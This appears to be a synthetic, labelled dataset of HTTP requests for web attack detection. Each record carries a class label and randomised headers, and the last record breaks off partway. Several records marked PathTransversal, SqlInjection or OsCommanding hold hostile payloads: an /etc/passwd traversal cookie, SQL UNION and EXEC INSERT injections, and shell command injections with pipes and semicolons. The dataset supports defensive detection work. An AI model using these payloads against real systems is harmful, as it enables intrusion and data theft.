Cookie: sTsr9tdtsgpHxa=tinoeceinoGnl
Cookie2: $Version="96"
Date: Sat, 29 Jan 05 06:22:27 GMT
ETag: "KVtY7dYtV4waMq2VI35"
Expect: 7ieoel
From: vumaCtt@lcmSrhje3.gov
If-Modified-Since: Thu, 27 Oct 05 19:16:07 UTC
If-Unmodified-Since: Wed, 29 Dec 04 23:03:11 CET
If-Match: *
If-None-Match: "@@LAwyKzYa9ZP8gMtXH"
If-Range: Sun, 10 Jul 05 03:45:45 UTC
Max-Forwards: 496
MIME-Version: 4.0
Pragma: OImyfnL='eac'
Proxy-Authorization: NTLM c2V3ZWEyQWhneDhnZnRWdG80dG9tdG5ycnRldHJtY2VpNw==
Authorization: ocaos ri6etaeu=ntOi4
Range: 29139-636434,80033-87
Referer: /sseiutdx/geforwis/mrtir.conf
TE: trailers,gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 5.1; A9-ml; rv:3.0.3) Gecko/56324209
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 632x378
Via: HTTP/0.9 49.181.218.80
Transfer-Encoding: gzip
Upgrade: teoevo/0.3, snoPeb/0.1, 2nelh/5.8
Warning: 166 www.i7eiao8.css "sae2iarEaeg" 
X-Forwarded-For: 206.189.164.246
X-Serial-Number: 981002451847227
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 27590
Start - Id: 46073
class: PathTransversal
GET /vXxMEQxterm/FX/hvawS3gMgUK1rhr.sh?eeesnu=ago&Eopwx=n-QFY&ai=Esoemllt8eei&jWCn8qdYsnull=xtermed+roausrae1dt&rk=05172&rautmiEmncirsrr=Ft+5processing-instructioneeexeciexec+oK%27egts&Assrh=eRTlyZ&kn9ni=tautoexec%7Cmgo97o&s6sm=evmeoItgN2e+&sHsc=hee&iieiflfwr=%3DAegyn&tn=cty&RlawaachntE4een=51019&C9h=714387&leatat=sx%24t8dci HTTP/1.0
Host: www.r649csg.cz:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-kr
Accept-Encoding: 
Accept-Language: cagdl0-ue6
Cache-Control: max-age=017
Cookie: uga4=../../../../../../../../../etc/passwd
Date: Tue, 07 Jul 09 09:30:39 GMT
Max-Forwards: 47
MIME-Version: 0.0
Authorization: Digest cnonce="fn4iv"
Referer: /oeydmmb.dll
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 1.1; yS-ef; rv:6.2.4) Gecko/85311865
Via: mh6/7.7 www.salen.gif, 0.8 150.103.181.58
Transfer-Encoding: identity

null

End - Id: 46073
Start - Id: 12275
class: Valid
GET /gtdorar/p30qQtpdtmn84e0Cu/leref4/Os/nzuO-u8lWsK0/evSE/ttp/unYgXWSje/a5ezw.aspx?Ulike_UcNEYb=e+&iboijwmOeEi=9386&aacev=7&t3m=537&2eiadel=04411&numceapemsehos=peidonti&nkelogVSDlrT@H=h2Snm&nueud3q=aejac7&nioodl7upo=2986173151&xhhewyeptcec=acceptto%2B+r5sATnmafh&BywS6xg.F=autoexecotr4ermaa HTTP/1.1
Host: www.tst8ink.net:38
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: bnnitsb=vobxoq
Client-ip: 47.72.93.255
Cookie: w9=171929;tzgEdse62fs=en ;rR=506684;hyeajagec=9ndand5I e ;QSMNJorHcat1RZ=chFmZkb
Cookie2: $Version="853"
Date: Sun, 26 Aug 07 17:29:24 UTC
ETag: "ET@n_AqlUV.56CF"
Expect: 100-continue
From: pwgrma@e4nqarn.be
If-Modified-Since: Mon, 18 Aug 08 14:35:41 GMT
If-Unmodified-Since: Sat, 05 Sep 09 10:46:22 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Jan 07 15:50:34 UTC
Max-Forwards: 036
MIME-Version: 5.0
Pragma: sssi3e=seags7b
Proxy-Authorization: Digest nc=BabeC041
Authorization: Basic bzM1d3JmT3E6c2U5bA==
Range: 9688-4015,-4,45-
Referer: /OedygEae.css
TE: gzip,gzip;q=0.3,chunked
Trailer: Range
User-Agent: hhltektoeh/7.4.3.9
UA-CPU: x86
UA-Disp: 689,5553,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 981x039
Via: FTP/8.3 53.146.60.0
Transfer-Encoding: compress
Upgrade: orI/9.5, ee72/8.3, etzc/3.2, tzoia/3.9, eNtat/2.4
Warning: 801 56.160.18.152 "x1hi" "Mon, 01 Dec 08 03:48:59 UTC"
X-Forwarded-For: 108.211.80.19
X-Serial-Number: 787463
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12275
Start - Id: 42745
class: SqlInjection
POST /ifYat2mHh9bQq.jpg? HTTP/1.1
Content-Length: 125
Content-Language: snpwrest,pw
Content-Encoding: identity
Content-Location: /oXarh/1eeseh/mdsddn/imodi.asmx
Content-MD5: ZnRVbm5vRWY0cWJ0Y3Nsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Feb 05 02:31:31 CET
Last-Modified: Tue, 01 Aug 06 22:58:21 CET
Host: 118.152.72.140:80
Connection: 8rrp2
Accept: text/*, image/gif;q=0.5, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.8, deflate;q=0.0
Accept-Language: *
Cache-Control: max-stale=7440
Client-ip: 190.248.104.33
Cookie: WLDCS.=197;yruhdbdoE=chairs' UNION     SELECT   NE   FROM    dba_users  WHERE  name     like     '%25;lSeujtsju=6826543
Cookie2: $Version="204"
Date: Thu, 15 Feb 07 11:49:24 CET
ETag: W/"5DjfBehqhBtt9WGZf"
Expect: 100-continue
From: olec@itnahevEod.st
If-Modified-Since: Mon, 09 Jan 06 19:41:10 UTC
If-Unmodified-Since: Fri, 11 Nov 05 07:06:58 CET
If-Match: *
If-None-Match: *
If-Range: "zHluyj0ZwDCf9XfA"
Max-Forwards: 1
MIME-Version: 2.2
Pragma: neeiac=n
Proxy-Authorization: npee tari=stsHdd
Authorization: Digest cnonce="7nurndri"
Range: 393-,35701-,-917891
Referer: /etnlEp/4o1u9tao/igahid/dpheu/avdnr.php4
TE: deflate;q=0.3
Trailer: Accept-Encoding
User-Agent: n.ckkBzmO http://www.mpl2eHe.ch
UA-CPU: StrongARM
UA-Disp: 430,3561,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 957x8790
Via: 9.8 www.eaaaJ4o.htm
Transfer-Encoding: deflate
Upgrade: af1oni/5.4, xfe/4.2, nsoe/1.0
Warning: 675 www.pEtAtw.shtml:6139 "znhdvNaaupmnxo0eii" 
X-Forwarded-For: 133.180.69.1
X-Serial-Number: 40137446111101
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

nSao3i7eulytedT=397&ausaaiLi=le7uetftmoo&BKmailaccept=Assstrm2chsteh&9lheree=ao&lemueptAtz7=en8ett&ry=poertwo&FAByKnEX=r.RW96

End - Id: 42745
Start - Id: 9350
class: Valid
GET /sLVd1s@i1F@otxKO/1Pn3.htm? HTTP/1.1
Host: 244.103.9.39:766
Connection: ysyo
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oBu-noanb;q=0.6, ttEUrpW-rooslnc, f76eer-a;q=0.8, o1es-osnce9;q=0.4, n-onHm02so;q=0.2
Cache-Control: totareS=sFt
Client-ip: 66.193.65.107
Cookie: letar=enaalSo;Inu=1323585;.uBmbLvJqFqscript=dndAyoM;0sbsI=9;brhap1=22
Cookie2: $Version="4"
Date: Sat, 05 Aug 06 02:30:09 GMT
ETag: W/"xvhS.zI0ihkfRaPDDYqq"
Expect: gEwhEed=lqmenxb
From: hwtSu76@kdazi.net
If-Modified-Since: Tue, 15 Apr 08 18:02:35 CET
If-Unmodified-Since: Tue, 18 Nov 08 18:19:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8067
MIME-Version: 3.5
Pragma: oue='RotlMc2'
Proxy-Authorization: Digest response="B825d3adf1bd037FBC9137aFb5a91dEF"
Authorization: Basic bmVtSTQ6bjJ0c3ls
Range: -41,91189-8,552-
Referer: http://www.ei3wtme1.de/lm8cmt/rgZ2nog/sse6.mdb
TE: deflate
Trailer: Accept-Charset
User-Agent: Mozilla/3.2 (Windows; U; Windows NT 0.4; Xz-ao; rv:8.2.4) Gecko/88393286
UA-CPU: Sparc
UA-Disp: 6680,235,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4908x484
Via: 6.6 www.yceeCfo.css, 7.6 193.77.139.122:81
Transfer-Encoding: compress
Upgrade: es6/9.5, tAt/4.9, pvrrag/3.1
Warning: 915 www.usatd.css "HmaH" 
X-Forwarded-For: 135.104.235.17
X-Serial-Number: 67976892237300
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9350
Start - Id: 11704
class: Valid
GET /lrdutdnouTd1iimg/eg8lmrbL4GastiF2.tiff?rsnt4mtloi=6738591&hNTd4X_U=rfu&n2t=%7EtniVpxe%27&tlufpm=3ef&oiloel1c=4530&ghaweuhsRltmo6=mempmb0&daescepioros=346529988&et=l%24log&aeoObkel5=sJ77L&atsam-bt2OP4.J=dnn+%3Fas&8molrru6a5sita=oihkSo1nQdtote3d&e1iwi=1&update0p-echodH=dd1evalhy%7Cis&sic1shnqisbeji=23&Aarsn8=0 HTTP/1.0
Host: www.pdgeiyrhnI.st:80
Connection: iodn
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=2104
Client-ip: 228.241.203.171
Cookie: nhfr=6312;trsSa=tao oeGct shutdownkgINo;dahrinHvjNl=+oo1tamkFseg
Cookie2: $Version="830"
Date: Sun, 06 Sep 09 16:22:23 UTC
ETag: W/"VpON5UPON.AF21N6"
Expect: 100-continue
From: sirxnDi@0oociO.fr
If-Modified-Since: Thu, 24 Feb 05 06:07:09 UTC
If-Unmodified-Since: Wed, 20 Jun 07 23:37:20 CET
If-Match: ".wAAcK-WcSiiZb3Y"
If-None-Match: *
If-Range: Thu, 06 Aug 09 14:21:59 UTC
Max-Forwards: 1
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="ciapc"
Authorization: Digest uri=/habrao/xscc/tceeitn/sePky4lo/ihfn.txt
Range: 9808-4454,-4,572-193568
Referer: http://n8ce0.st/9ipdsha/cs7inogt/nseyqntc/Sa0enr.doc
TE: chunked;q=0.2,trailers,chunked
Trailer: Accept-Encoding
User-Agent: gaieiaf4er/8.8.6
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9315x6291
Via: 6.9 www.glddeeqm.html, 7.9 51.255.213.13
Transfer-Encoding: identity
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 637 www.aeeraelm.tiff "lNtm2er4nisiubnubi" "Thu, 24 May 07 04:01:04 GMT"
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11704
Start - Id: 42629
class: SqlInjection
GET /rAsuttn.js?spacgdlpah6=ahavinglsdropzoc+iadeimct0sm0&erae=etcm&mWiframebodyEhPOAV=eHmd&oKrnen=8452596&zDps@5mZFIWCM=eer&ZnenSAzir=%3B+EXEC%28+%27INS%27%2B%27ERT+INTO+++users++values%2885333%2C%27rwiwrunNc%27%2C%27hide1a%27+%29%29&iar=4uvttefrfda&emnzsellm1l=tCcmdLt&pX8QWTlncSNMw=7790798306 HTTP/1.0
Host: 231.112.214.130
Connection: keep-alive
Accept: image/gif
Accept-Charset: windows-1252;q=0.5
Accept-Encoding: 
Accept-Language: r44enxfT-Lyp, a2FcwMe-nuneleEs;q=0.9
Cache-Control: no-cache
Client-ip: 186.220.126.30
Cookie: KTddmd=(|CeinserthgdRandwn;ao=lmochatmp>2;cJLUz=nkS/nodeswftpRbn;rcOe1rt= a3A jebody;bg=06932
Cookie2: $Version="78"
Date: Sat, 03 Nov 07 22:55:20 GMT
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: 100-continue
From: ik3a@umddedDee.biz
If-Modified-Since: Fri, 15 Jul 05 16:55:14 UTC
If-Unmodified-Since: Wed, 04 Jan 06 03:04:42 GMT
If-Match: "n.I4P4oLjmhBOuu3"
If-None-Match: *
If-Range: Fri, 06 Feb 09 06:33:59 CET
Max-Forwards: 19
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Saen 6ahrcn=dstav
Authorization: edese aorgt=egda
Range: 72326-9838
Referer: http://www.overeba.biz/aujta7s/apapans/o0eh.swf
TE: trailers
Trailer: Accept-Charset
User-Agent: rLYyLAF_s http://www.etllfsh.ch
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4720x346
Via: FTP/6.3 136.250.185.180:6, Anet/7.0 179.10.197.170
Transfer-Encoding: gzip
Upgrade: einTmf/2.4
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42629
Start - Id: 34220
class: Valid
POST /23Svq1Q8YFlB4WexXh/wuu/Whrdtq5v/medl/JJOoa/H-4TZzSZUXobO/enrcsd6ba/ee6/pKhwmotod1saarsDyl7/ee3@JIbgK/gylsfulEY.L@m5@sv.aspx? HTTP/1.0
Content-Length: 58
Content-Language: t,soae4i,eRn
Content-Encoding: identity
Content-Location: /oaegbase/andoa/anwejBk/taettes/uhRw.jpeg
Content-MD5: UjF5b2hoczZkb2FleHN4dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 May 04 24:53:19 CET
Last-Modified: Fri, 26 Nov 04 13:22:07 GMT
Host: 74.254.143.7
Connection: bnutmo
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=0
Client-ip: 2.129.247.203
Cookie: iP.Fobject9FUO=&;uecUoNn=440827043;2xp=pFr9;anaoitw=el+t
Cookie2: $Version="29"
Date: Sat, 13 Oct 07 04:34:36 CET
ETag: "Gg1B1yaE-jhaS2.AN"
Expect: leso
From: tmwyT@acvot.it
If-Modified-Since: Wed, 06 May 09 13:44:19 UTC
If-Unmodified-Since: Wed, 20 Oct 04 04:32:29 GMT
If-Match: "50E6rMpilrfzF7o"
If-None-Match: *
If-Range: Tue, 13 Nov 07 14:33:10 UTC
Max-Forwards: 6175
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bTJyYmw1ZGJudG90OWVydDR3aUEwdUgzZWFoYW1zYmUxZGV0ZW1oa2g=
Authorization: NTLM aGFwbmhhQXVUcG5yaHNyZTB0enN0YmRuYzQ5b3lpeGdlc3NybVNjY3RscGE=
Range: -4
Referer: http://www.ectmeo.biz/trsiz3e/3pteh/taenao/tMiah/jipeNz.txt
TE: deflate;q=0.9
Trailer: Referer
User-Agent: detiewggaiwahldi
UA-CPU: x86
UA-Disp: 6221,5236,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 219x8250
Via: 6.5 www.n6xjlen.css, 9.5 197.221.209.141:59310
Transfer-Encoding: identity
Upgrade: eheff/3.3, 6oy/8.9, DfS/8.2, dqosey/2.3
Warning: 658 86.246.59.59 "tuixeqnh6RE1" "Wed, 13 Sep 06 03:28:45 CET"
X-Forwarded-For: 43.8.248.224
X-Serial-Number: 7747668675736673
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

L4t_ml0A=aE1omtqttduh&2omTle6isftsd1=mn)TAvl2ilocation8d

End - Id: 34220
Start - Id: 9803
class: Valid
GET /hgts3ghini1nddut/ksgor7wMoangB.png?t65kktsTi=xxhi&thnsnpfujiifa=3&en=85612 HTTP/1.0
Host: 136.68.207.102
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=17
Client-ip: 142.252.165.176
Cookie: 9fA6stEe=e%3F52%28egne%29tenin;hl=6;%uTe-P=obcmdgdperlngtso6;ac4tphhue=dHeKeUjTd6U;xuhhhTlEk=xbetween%3A
Cookie2: $Version="74"
Date: Sun, 03 Aug 08 01:27:26 CET
ETag: "Gm.mVSyx-sz9IJIkCK"
Expect: 100-continue
From: 9rLl@rrheE.org
If-Modified-Since: Thu, 03 Jan 08 05:54:25 GMT
If-Unmodified-Since: Sun, 19 Oct 08 24:02:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7532
MIME-Version: 6.8
Pragma: dihib2='efms'
Proxy-Authorization: IsiUr 6twklat=tyei
Authorization: Digest realm
Range: -988,03-4,64-3
Referer: http://ioJeonr.it/doeh/e3npr/NldUenVe/SepltliR/o9evg79c.js
TE: gzip;q=0.2,trailers
Trailer: If-Unmodified-Since
User-Agent: gohrmio1y/4.8.4
UA-CPU: PowerPC
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3832x6503
Via: 9.6 197.120.182.109:4, 2.4 35.197.37.241, 6.9 247.47.160.218
Transfer-Encoding: deflate
Upgrade: jaeNfe/6.3, eitr/9.7, Eia/7.9, ryge/4.3
Warning: 683 www.lekogh.htm "7aiia9iehlscILetre" "Fri, 16 May 08 10:49:45 GMT"
X-Forwarded-For: 239.251.116.128
X-Serial-Number: 3012101828224515543
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9803
Start - Id: 9349
class: Valid
GET /Udedslsvc/ASU1uet9/Albgsound5rskbrm/qy9ilmdaeri8/IB3RN/nyzBM/r07iLmtogg4/i9rG5k2qk/1c9tfeotr5uhsihTlz.php3?aeee=21231161&h9mti=+epwasyAnboammi&adminF.N=omsW%40mhne+&iempt6ek5emi=77&ens1v1e0iu=%7Esystemona%3F&XKI.L=Loaae6ipl64Akdn&mAu73ycuzc=to%5D0&faGzo8=1060&ra=nsd HTTP/1.0
Host: 237.236.66.55
Connection: jiip5
Accept: */*
Accept-Charset: iso-8859-9;q=0.3, cp-932, euc-cn, x-mac-ce;q=0.6, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 66.193.65.107
Cookie: letar=enaalSo;Inu=1323585;.uBmbLvJqFqscript=dndAyoM;0sbsI=9;brhap1=22
Cookie2: $Version="698"
Date: Sun, 27 Aug 06 12:52:04 UTC
ETag: W/"xvhS.zI0ihkfRaPDDYqq"
Expect: gEwhEed=lqmenxb
From: hwtSu76@kdazi.net
If-Modified-Since: Tue, 15 Apr 08 18:02:35 CET
If-Unmodified-Since: Tue, 18 Nov 08 18:19:11 CET
If-Match: "P-zjClOVREAeIzeiLM8a"
If-None-Match: *
If-Range: *
Max-Forwards: 8067
MIME-Version: 3.5
Pragma: oue='RotlMc2'
Proxy-Authorization: ud0w tNdb=terh
Authorization: NTLM cnNpYWVvaWlvZWVoaWV0YnRpaXFoaG9zMXNiY3RldWN1ZW5mSW4=
Range: -41,91189-8,552-
Referer: /VnDwejn6/NaveH6/irisrn.dll
TE: deflate
Trailer: Accept-Charset
User-Agent: yeefE (g_bBLDmDl; 9Po9uYRv; sGiMtFczpW; i0pO8-b)
UA-CPU: Sparc
UA-Disp: 6680,235,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4908x484
Via: 6.6 www.yceeCfo.css, 7.6 193.77.139.122:81
Transfer-Encoding: compress
Upgrade: es6/9.5, tAt/4.9, pvrrag/3.1
Warning: 709 17.102.2.9 "acKn" 
X-Forwarded-For: 135.104.235.17
X-Serial-Number: 547937041185826095
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9349
Start - Id: 18494
class: Valid
GET /etcp.meta/hBLYL1Nj1qaKo/ntma/avArNbqPVTWFNat/me74eedaiuhiWVlev/HexecPVESev-Ddg.jsp?cb6wl=Ntx4fFreRt&ee6scb1LHy=+%25eNhthechookees&MMXgHCzHd=641689&wHxGQQU=87710132&e00twmw=919 HTTP/1.1
Host: 136.132.231.149:524
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: nRr-dntes, rnhi-qL, haRcE-dcei;q=0.9, 7-o
Cache-Control: yasot5t='gnAihu'
Client-ip: 117.52.42.62
Cookie: ltti1b3er=minn3;awsOsu=2;evalJHform=44385478;3xmolpvot=2678322254;5noiluo=422174
Cookie2: $Version="2"
Date: Thu, 24 Jan 08 18:30:50 UTC
ETag: W/"-4omQvbN_jok3ub1vq"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Mon, 30 Jan 06 15:19:33 CET
If-Unmodified-Since: Wed, 27 May 09 17:59:23 GMT
If-Match: "6h2fzQolgIA-aa8"
If-None-Match: "lD92KjCCYFpTEdwY22"
If-Range: Fri, 29 Jan 10 06:13:08 GMT
Max-Forwards: 73
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: Basic YW5sbnVCbzpzZWVyN290
Range: 85-,-50971,7583-04
Referer: http://www.dtrece6.uk/z3wso/hsedafd/iyonvtId/shtn/tqoom.mpg
TE: deflate;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: bfrluwlt1 (z@xIOh3yz; tZUqc@G; nvR.yl7s; iaV6QBs)
UA-CPU: MIPS
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 934x751
Via: 3.0 www.c7sno.jpeg, 4.2 199.208.108.217:6, FTP/9.9 www.oLEosot.png
Transfer-Encoding: oewL
Upgrade: ryat/0.4, gavm/5.1, n8hana/0.1
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 100961283776
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18494
Start - Id: 44600
class: OsCommanding
GET /yxuRyBkVcy44iEgfYm2i/tophPs4IYDQO/terxtadanNo/ta/fe/hoURhx/lx6B/hsemhz/tJzlE0Ct_Q99G8zCi/0YlGBwxWO/cOqEWGXM/AieZof1ltgvo8at27.css?r6epl=m&pabn8sj=3rn4%2Bm&fratsienmsytq=119.243.56.227+++%7C++++echo+%22test%22+%3Eevilfile.txt&a8o=50 HTTP/1.0
Host: www.rutYt.be
Connection: keep-alive
Accept: video/*, text/plain, video/*;q=0.8
Accept-Charset: x-mac-greek, windows-1252;q=0.5, x-mac-arabic, iso-10646-ucs-2;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: YhKroqav=oi
Client-ip: 97.130.78.86
Cookie: ntfs3mr=sosyertlivdwd4ains
Cookie2: $Version="67"
Date: Tue, 21 Mar 06 06:59:16 UTC
ETag: "p_P9vOiouaIKD.F3Dkb-"
Expect: 100-continue
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Sun, 26 Aug 07 18:22:39 GMT
If-Unmodified-Since: Wed, 22 Jun 05 01:49:14 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Mar 06 19:45:04 GMT
Max-Forwards: 36
MIME-Version: 1.7
Pragma: 5b=muTns
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Digest realm
Range: 8-
Referer: http://www.neO6lr2.net/twl2na/fata/rnoowz.txt
TE: trailers
Trailer: Authorization
User-Agent: aNUjK3 http://www.inatee.st
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/1.4 49.139.180.106, HTTP/9.1 www.ltZsi.gif, 6.4 www.ftnx.js
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 099 188.171.255.136 "sresnpusmMne" "Wed, 01 Apr 09 06:36:17 GMT"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44600
Start - Id: 43160
class: OsCommanding
GET /TZwwgFvtmpjinputGq/e_tiaK/sOz5stnrzSrrmliicn/telnet151evalvF/QMPsam_E0UV/tlqc-aW-0g_GzxG-u4/iestetdNeord/evtYiu/iWSfqq/all0he/ieemrnjirhrwuS.nsf?cstylezA=fia+r&QSGVyb6FmSx=%27+++%3B+++++cat+%2Ftmp%2Fresmail+++++ngrait%40nder.com++%3B&G4PS-o-3S=eil%7Esqo HTTP/1.1
Host: 193.255.56.95:92807
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-icelandic, windows-1257;q=0.4, iso-8859-4;q=0.3, x-mac-arabic
Accept-Encoding: 
Accept-Language: 2ddn-dhilnhv, h-e6g
Cache-Control: no-store
Client-ip: 147.97.110.132
Cookie: ZgH15j3d=wOo
Cookie2: $Version="36"
Date: Wed, 06 Oct 04 10:33:13 GMT
ETag: W/"Wm-uQG@VhFKtK.gNS7"
Expect: ucdhrA
From: riAeyrh@tgaMea.st
If-Modified-Since: Tue, 04 Jan 05 16:24:55 UTC
If-Unmodified-Since: Sun, 06 Jan 08 15:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 9.5
Pragma: ea=ep0R
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: Digest realm
Range: -1
Referer: /tpthi/loSi.zip
TE: chunked;q=0.8
Trailer: If-Match
User-Agent: Mozilla/3.6 (X11; U; Linux i386 7.5; 6t-st; rv:0.1.3) Gecko/17128237
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 807x674
Via: 3.3 www.ijt39.css:6180
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43160
Start - Id: 17300
class: Valid
GET /e8l/bmialai88/27xJW/eotxei8e1OcmuIn/nhh9ei/rh6sR/hn.x-mJ8XwpOxf/enErn2osoiktiIh/clmzens/xaoOdecst.jpg?Tt=24&mntari2uwc=0d2nrmTiep&c8bOti1hi=3DoshetbOho&ORohE85rnam4er=qaeiohend&ds3d=nrbijske3 HTTP/1.0
Host: www.oil0a.st
Connection: 24Va
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=70879
Client-ip: 8.71.56.250
Cookie: i6TtcE=189886
Cookie2: $Version="1"
Date: Wed, 31 Mar 04 12:21:57 GMT
ETag: W/"tUtIzZLIRTEv2QLQH"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Sun, 11 Jan 09 17:56:52 CET
If-Unmodified-Since: Sun, 04 Mar 07 09:35:39 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Oct 07 13:58:22 CET
Max-Forwards: 0
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: eirux knieeo=9h8tlf
Range: -03,4-133137
Referer: http://aRrAncml.it/eiDeeqhy.shtml
TE: deflate,chunked
Trailer: Pragma
User-Agent: a34ewloe http://www.Cehoi.de
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0027x5589
Via: 0.9 www.etmiala6.gif
Transfer-Encoding: compress
Upgrade: gnoa/0.3, nree/3.4, 2t3kns/8.8, Fnehon/4.7, kr7scp/0.5
Warning: 526 102.181.177.151 "iqxaehtm" "Wed, 11 Jun 08 17:56:22 GMT"
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17300
Start - Id: 31948
class: Valid
GET /rDtvTvC3./dh5CK3.Och27Kr.sh?98HON=k%5C&snfit0e=22&oneeHgb=5631210148 HTTP/1.0
Host: 3.38.180.136
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, compress;q=0.9, gzip;q=0.4, deflate
Accept-Language: e-sg7the, B-w, aitsd8-hrm;q=0.7, sh-Adp2
Cache-Control: max-stale
Client-ip: 114.29.153.102
Cookie: esoe=biA;ezrsigalsmk=oyasijvFlwa4schd;i8VVNn=72817;daftp9ierbtem=w;zis= rtwinnt
Cookie2: $Version="84"
Date: Sat, 03 May 08 23:20:06 GMT
ETag: "vMcUI3iNgXpZhcM"
Expect: dIiLec=ZeoefT
From: h4ras@eu8lf.gov
If-Modified-Since: Thu, 29 Oct 09 01:10:39 UTC
If-Unmodified-Since: Thu, 30 Jul 09 04:27:57 GMT
If-Match: *
If-None-Match: *
If-Range: "WGktA-jiSc3QzphXgMM"
Max-Forwards: 72
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJyWGU4c2VtZDhhZWVlbnVsM2dlODF0bHJyb2xvdmFzZWQ=
Authorization: Basic eXRuRXM6aXNpdGlp
Range: -8,3314-2228
Referer: /m23shu/zee1l5/ciEgh/Mupfjob/ritgiM.php3
TE: chunked,trailers,deflate
Trailer: Expect
User-Agent: bjtUaNer1lnueTmw0
UA-CPU: 68000
UA-Disp: 3482,947,16
UA-OS: Windows 98
